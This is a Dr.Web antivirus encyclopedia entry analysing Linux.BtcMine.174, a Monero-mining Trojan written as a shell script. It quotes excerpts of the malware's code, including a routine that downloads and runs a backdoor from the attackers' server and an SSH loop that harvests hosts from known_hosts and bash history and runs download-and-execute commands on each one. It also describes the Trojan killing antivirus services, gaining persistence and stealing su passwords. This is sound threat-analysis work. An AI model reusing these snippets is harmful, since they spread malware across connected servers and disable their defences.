Защити созданное

Другие наши ресурсы

Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Поддержка
Круглосуточная поддержка | Правила обращения

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86
Локальная тех.поддержка:
+380 (44) 224-41-60

ЧаВо | Форум | Бот самоподдержки Telegram

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Глобальная поддержка:
+7 (495) 789-45-86
Локальная тех.поддержка:
+380 (44) 224-41-60

Профиль

Linux.BtcMine.174

Добавлен в вирусную базу Dr.Web:2018-11-14
Описание добавлено:

Linux.BtcMine.174

  • 9ae9233c79390495e607059870671c9936c413c5
  • b59fc07afc9f159562f71b3a21c38b1d471acc2f

A multicomponent malware program capable of infecting Linux devices and intended to be used for Monero (XMR) mining. It is implemented as a shell script containing over 1,000 lines of code.

When launched, it checks whether the server, from which the Trojan will subsequently download additional modules, is available:

function GetDownloadPath()
{
    paths=("/usr/bin" "/bin" "/lib" "/boot" "/tmp" "/home/`whoami`" "`pwd`")
    for path in ${paths[@]}
    do
        if [ -x $path ] && [ -r $path ] && [ -w $path ]
        then
            DownloadPath=$path
            break
        fi
    done
}

If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package).
WatchDogName="diskmanagerd"
arg=$1
#...
function Nohup()
{
    if [ "$arg" != "/sbin/init" ]
    then
        rm -f $DownloadPath$WatchDogName >/dev/null 2>&1
        cp -rf $0 $DownloadPath$WatchDogName
        chmod 755 $DownloadPath$WatchDogName >/dev/null 2>&1
        rm -f $0
        nohup --help >/dev/null 2>&1
        if [ $? -eq 0 ]
        then
            nohup $DownloadPath$WatchDogName "/sbin/init"> $DownloadPath.templog 2>&1 &
            exit
        else
            if [ `id -u` -eq "0" ]
            then
                yum install coreutils -y  >/dev/null 2>&1
                apt-get install coreutils -y  >/dev/null 2>&1
                sleep 30
            fi
            (exec $DownloadPath$WatchDogName "/sbin/init" &> /dev/null &)
            exit
        fi
    fi
}

Then the Trojan downloads and runs a version of the Linux.BackDoor.Gates.9 Trojan. This family of backdoors allows commands issued by cybercriminals to be executed and DDoS attacks to be carried out:

function oh_cause_she_is_dead()
{
    md5sum --help >/dev/null 2>&1
    if [ "$?" = "0" ]
    then
        if [ `id -u` -eq "0" ]
        then
            DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
        else
            DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        fi
    else
        if [ `id -u` -eq "0" ]
        then
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
        else
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        fi
    fi
    chmod 755 "$DownloadPath$DownloadFileName"
    $DownloadPath$DownloadFileName
}

After that, the malware program searches for other miners and removes them when it detects them. For this, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.).

If Linux.BtcMine.174 was not launched as root, it downloads and runs another shell script (SHA1: 9ae9233c79390495e607059870671c9936c413c5) from the attackers’ server, which, in turn, downloads and runs a number of exploits to escalate the privileges of Linux.Exploit.CVE-2016-5195 (DirtyCow) and Linux.Exploit.CVE-2013-2094 in the system.

In the next step, the script checks to see whether it is running as root. If it is, it stops services, removes their files using package managers, and empties the directories. The names of the following services are listed in the script: safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.

Then the Trojan adds itself to the Autorun list, using /etc/rc.local, /etc/rc.d/..., /etc/cron.hourly. After that, it downloads and launches a rootkit, also executed as a shell script. Among the rootkit module’s notable features is the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

After that, the Trojan runs a feature that collects data from various sources about all the hosts to which the current user has previously connected via SSH. The Trojan tries to connect to these hosts and infect them:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /tmp/.h|grep -v 127.0.0.1|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
do
    (
        exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\",@file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';File.open('/tmp/', 'w') {|f| f.write(open('') {|f1| f1.read})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &
    )
done

Next, the Trojan launches and maintains a Monero (XMR) miner. In an infinite loop, the script checks for updates on a remote server so that it can download and install them if they become available. To do that, it carries out the following actions:

  1. The current script version number is stored to the $shell_ver variable.
  2. The file http://${remote_host}:${remote_port}/shell_ver.txt is downloaded.
  3. The obtained version is checked against the current one. If they match, nothing happens; if they do not match, the Trojan downloads the new script version from the management server.

News about the Trojan

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2019

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.